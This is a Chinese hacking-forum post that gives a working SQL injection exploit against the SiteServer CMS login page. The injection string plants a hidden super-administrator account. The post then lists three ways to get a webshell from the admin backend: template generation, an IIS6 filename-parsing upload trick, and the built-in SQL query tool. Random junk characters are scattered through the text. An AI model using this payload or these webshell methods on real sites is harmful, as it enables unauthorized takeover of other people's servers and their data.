中国网络渗透测试联盟

标题: SiteServer CMS UserCenter/login.aspx页面用户名处sql注射 [打印本页]

作者: admin    时间: 2013-2-16 21:40
标题: SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版1 N' x. M: a/ B3 A8 ?
stieserver官网:www.siteserver.cn* n( U% P) i' G) K6 i& s
EXP:
. |8 ?9 {; J5 `直接访问UserCenter/login.aspx8 l) v) |' U* @" I2 e# [: M
用户名处输入:
# h+ [* t+ N9 Z! A: ]9 V& V  u6 G+ ~" @5 n! ]$ J
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–' e/ k1 d3 A3 ^5 o6 C6 `
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
' ^( N% V+ B8 A( B之后再访问后台SiteServer/login.aspx用插入的用户登陆
1 ~6 @" t" p* x1 O+ h7 v% L3 a( R后台拿webshell的三种方法:! }  T- }! C# X. `. A& }9 L- N
一、6 K" c8 R. k. s: G
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx1 r: h  D$ |9 @9 ^: ?5 V
二、3 T$ [8 y- ~4 m# N. X
成员权限-》添加用户-》用户名为:1.asp
/ S! o& u, D/ P/ K/ d" w9 ]http://127.0.0.1/usercenter/  Z) w: Z+ h4 c) M
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
  e7 E/ p3 b/ z$ _(ps:后台添加用户时不会验证是否含有非法字符)$ |6 i. z7 G4 ?
三、4 ^' h* @* }2 |5 K; t& I) F) J
系统工具-》实用工具-》机器参数查看% {1 @: z+ H' M. V
可以看到数据库类型、名称,WEB路径
3 m: U4 D$ o/ [& ]1 b& C8 Q5 V& c系统工具-》数据库工具-》SQL语句查询6 @# I! I6 q1 a; y7 J
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2